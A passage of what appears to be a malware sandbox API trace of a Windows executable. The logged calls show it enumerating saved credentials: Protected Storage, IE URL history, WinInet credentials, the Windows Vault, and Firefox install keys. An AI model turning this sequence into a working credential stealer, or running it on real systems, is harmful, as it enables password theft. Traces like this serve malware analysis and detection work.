(lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x29c [0581.329] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0581.329] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52e458 | out: phkResult=0x52e458*=0x2cc) returned 0x0 [0581.329] RegQueryValueExW (in: hKey=0x2cc, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52e484, lpData=0x0, lpcbData=0x52e46c*=0x0 | out: lpType=0x52e484*=0x3, lpData=0x0, lpcbData=0x52e46c*=0x6f0) returned 0x0 [0581.329] RegQueryValueExW (in: hKey=0x2cc, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52e484, lpData=0x4124b8, lpcbData=0x52e46c*=0x6f0 | out: lpType=0x52e484*=0x3, lpData=0x4124b8*, lpcbData=0x52e46c*=0x6f0) returned 0x0 [0581.329] RegCloseKey (hKey=0x2cc) returned 0x0 [0581.329] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x52e46c, lpdwDisposition=0x0 | out: phkResult=0x52e46c*=0x2cc, lpdwDisposition=0x0) returned 0x0 [0581.329] RegSetValueExW (in: hKey=0x2cc, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x40cf68*, cbData=0x6f0 | out: lpData=0x40cf68*) returned 0x0 [0581.329] RegCloseKey (hKey=0x2cc) returned 0x0 [0581.329] ReleaseMutex (hMutex=0x29c) returned 1 [0581.329] CloseHandle (hObject=0x29c) returned 1 [0581.329] OleInitialize (pvReserved=0x0) returned 0x0 [0581.329] LoadLibraryW (lpLibFileName="Pstorec.dll") returned 0x74f10000 [0581.468] GetProcAddress (hModule=0x74f10000, lpProcName="PStoreCreateInstance") returned 0x74f1526c [0581.468] PStoreCreateInstance () returned 0x0 [0586.478] FreeLibrary (hLibModule=0x74f10000) returned 1 [0586.479] CoCreateInstance (in: rclsid=0x380350*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x380360*(Data1=0xafa0dc11, Data2=0xc313, Data3=0x11d0, Data4=([0]=0x83, [1]=0x1a, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0xae, [7]=0x38)), ppv=0x52e33c | out: ppv=0x52e33c*=0x5a11e0) returned 0x0 [0587.172] IUrlHistoryStg:EnumUrls (in: This=0x5a11e0, ppenum=0x52e340 | out: ppenum=0x52e340*=0x5e5080) returned 0x0 [0587.193] IUnknown:Release (This=0x5a11e0) returned 0x1 [0587.193] lstrlenW (lpString="abe2869f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="Ƅbe2869f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="Ƅƈe2869f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔ2869f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈ869f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈà69f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØ9f-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäf-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ-9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´9b47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äb47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈ47-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐ7-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ-4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´4cd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´Ðcd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´Ðƌd9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐ9-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä-a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´a358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´Ƅ358-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌ58-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔ8-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà-c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´c22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌ22904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈ2904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈ904dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈä04dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀ4dba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐdba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐƐba7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐƐƈa7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐƐƈƄ7f7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐƐƈƄÜf7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐƐƈƄÜƘ7") returned 36 [0587.193] lstrlenW (lpString="ƄƈƔÈàØäƘ´äƈÐÜ´ÐƌƐä´ƄÌÔà´ƌÈÈäÀÐƐƈƄÜƘÜ") returned 36 [0587.194] CredEnumerateW (in: Filter="Microsoft_WinInet_*", Flags=0x0, Count=0x52e340, Credential=0x52e33c | out: Count=0x52e340, Credential=0x52e33c) returned 0 [0587.194] GetVersionExW (in: lpVersionInformation=0x52e230*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x52e230*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0587.194] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x74ea0000 [0587.237] GetProcAddress (hModule=0x74ea0000, lpProcName="VaultOpenVault") returned 0x74ea26a9 [0587.238] GetProcAddress (hModule=0x74ea0000, lpProcName="VaultCloseVault") returned 0x74ea2718 [0587.238] GetProcAddress (hModule=0x74ea0000, lpProcName="VaultEnumerateItems") returned 0x74ea3099 [0587.238] GetProcAddress (hModule=0x74ea0000, lpProcName="VaultGetItem") returned 0x74ea3242 [0587.238] GetProcAddress (hModule=0x74ea0000, lpProcName="VaultGetItem") returned 0x74ea3242 [0587.238] GetProcAddress (hModule=0x74ea0000, lpProcName="VaultFree") returned 0x74ea4321 [0587.238] VaultOpenVault () returned 0x0 [0587.775] VaultEnumerateItems () returned 0x0 [0587.775] VaultFree () returned 0x0 [0587.775] VaultCloseVault () returned 0x0 [0587.775] FreeLibrary (hLibModule=0x74ea0000) returned 1 [0587.776] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0587.776] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e5080 [0587.776] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla", phkResult=0x52e338 | out: phkResult=0x52e338*=0x2e4) returned 0x0 [0587.776] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x5e5080, lpcchName=0x52e334, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e334, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.776] lstrlenW (lpString="\\") returned 1 [0587.776] lstrlenW (lpString="Software\\Mozilla") returned 16 [0587.776] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0587.776] lstrlenW (lpString="Firefox") returned 7 [0587.776] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0587.776] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed72a0 [0587.776] LocalFree (hMem=0x5d3958) returned 0x0 [0587.776] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0587.776] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2d4 | out: phkResult=0x52e2d4*=0x4d0) returned 0x0 [0587.777] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e2bc, lpData=0x0, lpcbData=0x52e2d0*=0x0 | out: lpType=0x52e2bc*=0x0, lpData=0x0, lpcbData=0x52e2d0*=0x0) returned 0x2 [0587.777] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e2a8 | out: phkResult=0x52e2a8*=0x4d0) returned 0x0 [0587.777] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e290, lpData=0x0, lpcbData=0x52e2a4*=0x0 | out: lpType=0x52e290*=0x0, lpData=0x0, lpcbData=0x52e2a4*=0x0) returned 0x2 [0587.777] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e27c | out: phkResult=0x52e27c*=0x4d0) returned 0x0 [0587.777] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e264, lpData=0x0, lpcbData=0x52e278*=0x0 | out: lpType=0x52e264*=0x0, lpData=0x0, lpcbData=0x52e278*=0x0) returned 0x2 [0587.777] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.777] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e6108 [0587.777] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x52e2fc | out: phkResult=0x52e2fc*=0x4d0) returned 0x0 [0587.777] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e6108, lpcchName=0x52e2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x52e2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.777] lstrlenW (lpString="\\") returned 1 [0587.777] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0587.777] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7360 [0587.777] lstrlenW (lpString="Crash Reporter") returned 14 [0587.777] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0587.777] LocalAlloc (uFlags=0x40, uBytes=0xd0) returned 0x5977a0 [0587.777] LocalFree (hMem=0x2ed7360) returned 0x0 [0587.777] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Firefox") returned="Firefox\\Crash Reporter" [0587.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e298 | out: phkResult=0x52e298*=0x664) returned 0x0 [0587.778] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e280, lpData=0x0, lpcbData=0x52e294*=0x0 | out: lpType=0x52e280*=0x0, lpData=0x0, lpcbData=0x52e294*=0x0) returned 0x2 [0587.778] RegCloseKey (hKey=0x664) returned 0x0 [0587.778] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e26c | out: phkResult=0x52e26c*=0x664) returned 0x0 [0587.778] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e254, lpData=0x0, lpcbData=0x52e268*=0x0 | out: lpType=0x52e254*=0x0, lpData=0x0, lpcbData=0x52e268*=0x0) returned 0x2 [0587.778] RegCloseKey (hKey=0x664) returned 0x0 [0587.778] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e240 | out: phkResult=0x52e240*=0x664) returned 0x0 [0587.778] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e228, lpData=0x0, lpcbData=0x52e23c*=0x0 | out: lpType=0x52e228*=0x0, lpData=0x0, lpcbData=0x52e23c*=0x0) returned 0x2 [0587.778] RegCloseKey (hKey=0x664) returned 0x0 [0587.778] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0587.778] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x664) returned 0x0 [0587.778] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x5eb208, lpcchName=0x52e2bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0587.778] RegCloseKey (hKey=0x664) returned 0x0 [0587.778] LocalFree (hMem=0x5eb208) returned 0x0 [0587.780] LocalFree (hMem=0x5977a0) returned 0x0 [0587.780] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e6108, lpcchName=0x52e2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.780] lstrlenW (lpString="\\") returned 1 [0587.780] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0587.781] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7360 [0587.781] lstrlenW (lpString="TaskBarIDs") returned 10 [0587.781] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0587.781] LocalAlloc (uFlags=0x40, uBytes=0xc8) returned 0x5d73b0 [0587.781] LocalFree (hMem=0x2ed7360) returned 0x0 [0587.781] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0587.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e298 | out: phkResult=0x52e298*=0x664) returned 0x0 [0587.781] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e280, lpData=0x0, lpcbData=0x52e294*=0x0 | out: lpType=0x52e280*=0x0, lpData=0x0, lpcbData=0x52e294*=0x0) returned 0x2 [0587.781] RegCloseKey (hKey=0x664) returned 0x0 [0587.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e26c | out: phkResult=0x52e26c*=0x664) returned 0x0 [0587.781] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e254, lpData=0x0, lpcbData=0x52e268*=0x0 | out: lpType=0x52e254*=0x0, lpData=0x0, lpcbData=0x52e268*=0x0) returned 0x2 [0587.781] RegCloseKey (hKey=0x664) returned 0x0 [0587.781] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e240 | out: phkResult=0x52e240*=0x664) returned 0x0 [0587.781] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e228, lpData=0x0, lpcbData=0x52e23c*=0x0 | out: lpType=0x52e228*=0x0, lpData=0x0, lpcbData=0x52e23c*=0x0) returned 0x2 [0587.781] RegCloseKey (hKey=0x664) returned 0x0 [0587.781] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0587.781] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x664) returned 0x0 [0587.782] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x5eb208, lpcchName=0x52e2bc, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2bc, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0587.782] RegCloseKey (hKey=0x664) returned 0x0 [0587.782] LocalFree (hMem=0x5eb208) returned 0x0 [0587.782] LocalFree (hMem=0x5d73b0) returned 0x0 [0587.782] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x2, lpName=0x5e6108, lpcchName=0x52e2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0587.782] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.782] LocalFree (hMem=0x5e6108) returned 0x0 [0587.782] LocalFree (hMem=0x2ed72a0) returned 0x0 [0587.782] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x5e5080, lpcchName=0x52e334, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e334, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0587.782] RegCloseKey (hKey=0x2e4) returned 0x0 [0587.782] LocalFree (hMem=0x5e5080) returned 0x0 [0587.782] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0587.782] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e5080 [0587.782] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla", phkResult=0x52e324 | out: phkResult=0x52e324*=0x2e4) returned 0x0 [0587.782] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x0, lpName=0x5e5080, lpcchName=0x52e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x52e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.782] lstrlenW (lpString="\\") returned 1 [0587.782] lstrlenW (lpString="Software\\Mozilla") returned 16 [0587.782] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0587.782] lstrlenW (lpString="Firefox") returned 7 [0587.782] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0587.782] LocalAlloc (uFlags=0x40, uBytes=0xb2) returned 0x2ed72a0 [0587.782] LocalFree (hMem=0x5d3958) returned 0x0 [0587.782] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0587.782] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x4d0) returned 0x0 [0587.782] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e2a8, lpData=0x0, lpcbData=0x52e2bc*=0x0 | out: lpType=0x52e2a8*=0x0, lpData=0x0, lpcbData=0x52e2bc*=0x0) returned 0x2 [0587.782] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.782] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e294 | out: phkResult=0x52e294*=0x4d0) returned 0x0 [0587.783] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e27c, lpData=0x0, lpcbData=0x52e290*=0x0 | out: lpType=0x52e27c*=0x0, lpData=0x0, lpcbData=0x52e290*=0x0) returned 0x2 [0587.783] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e268 | out: phkResult=0x52e268*=0x0) returned 0x2 [0587.783] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5e6108 [0587.783] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x52e2e8 | out: phkResult=0x52e2e8*=0x4d0) returned 0x0 [0587.783] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x0, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.783] lstrlenW (lpString="\\") returned 1 [0587.783] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0587.783] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed7360 [0587.783] lstrlenW (lpString="TaskBarIDs") returned 10 [0587.783] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0587.783] LocalAlloc (uFlags=0x40, uBytes=0xc8) returned 0x5d73b0 [0587.783] LocalFree (hMem=0x2ed7360) returned 0x0 [0587.783] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\TaskBarIDs", lpSrch="Firefox") returned="Firefox\\TaskBarIDs" [0587.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e284 | out: phkResult=0x52e284*=0x664) returned 0x0 [0587.783] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e26c, lpData=0x0, lpcbData=0x52e280*=0x0 | out: lpType=0x52e26c*=0x0, lpData=0x0, lpcbData=0x52e280*=0x0) returned 0x2 [0587.783] RegCloseKey (hKey=0x664) returned 0x0 [0587.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e258 | out: phkResult=0x52e258*=0x664) returned 0x0 [0587.783] RegQueryValueExW (in: hKey=0x664, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e240, lpData=0x0, lpcbData=0x52e254*=0x0 | out: lpType=0x52e240*=0x0, lpData=0x0, lpcbData=0x52e254*=0x0) returned 0x2 [0587.783] RegCloseKey (hKey=0x664) returned 0x0 [0587.783] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e22c | out: phkResult=0x52e22c*=0x0) returned 0x2 [0587.783] LocalAlloc (uFlags=0x40, uBytes=0x1080) returned 0x5eb208 [0587.783] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Firefox\\TaskBarIDs", phkResult=0x52e2ac | out: phkResult=0x52e2ac*=0x664) returned 0x0 [0587.784] RegEnumKeyExW (in: hKey=0x664, dwIndex=0x0, lpName=0x5eb208, lpcchName=0x52e2a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x52e2a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0587.784] RegCloseKey (hKey=0x664) returned 0x0 [0587.784] LocalFree (hMem=0x5eb208) returned 0x0 [0587.784] LocalFree (hMem=0x5d73b0) returned 0x0 [0587.784] RegEnumKeyExW (in: hKey=0x4d0, dwIndex=0x1, lpName=0x5e6108, lpcchName=0x52e2e4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="TaskBarIDs", lpcchName=0x52e2e4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0587.784] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.784] LocalFree (hMem=0x5e6108) returned 0x0 [0587.784] LocalFree (hMem=0x2ed72a0) returned 0x0 [0587.784] RegEnumKeyExW (in: hKey=0x2e4, dwIndex=0x1, lpName=0x5e5080, lpcchName=0x52e320, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla Firefox", lpcchName=0x52e320, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0587.784] lstrlenW (lpString="\\") returned 1 [0587.784] lstrlenW (lpString="Software\\Mozilla") returned 16 [0587.784] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0587.784] lstrlenW (lpString="Mozilla Firefox") returned 15 [0587.784] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0587.784] LocalAlloc (uFlags=0x40, uBytes=0xc2) returned 0x5d73b0 [0587.784] LocalFree (hMem=0x5d3958) returned 0x0 [0587.784] StrStrIW (lpFirst="Software\\Mozilla\\Mozilla Firefox", lpSrch="Firefox") returned="Firefox" [0587.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20019, phkResult=0x52e2c0 | out: phkResult=0x52e2c0*=0x4d0) returned 0x0 [0587.784] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e2a8, lpData=0x0, lpcbData=0x52e2bc*=0x0 | out: lpType=0x52e2a8*=0x0, lpData=0x0, lpcbData=0x52e2bc*=0x0) returned 0x2 [0587.784] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x52e294 | out: phkResult=0x52e294*=0x4d0) returned 0x0 [0587.784] RegQueryValueExW (in: hKey=0x4d0, lpValueName="PathToExe", lpReserved=0x0, lpType=0x52e27c, lpData=0x0, lpcbData=0x52e290*=0x0 | out: lpType=0x52e27c*=0x0, lpData=0x0, lpcbData=0x52e290*=0x0) returned 0x2 [0587.784] RegCloseKey (hKey=0x4d0) returned 0x0 [0587.784] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x52e268 | out: 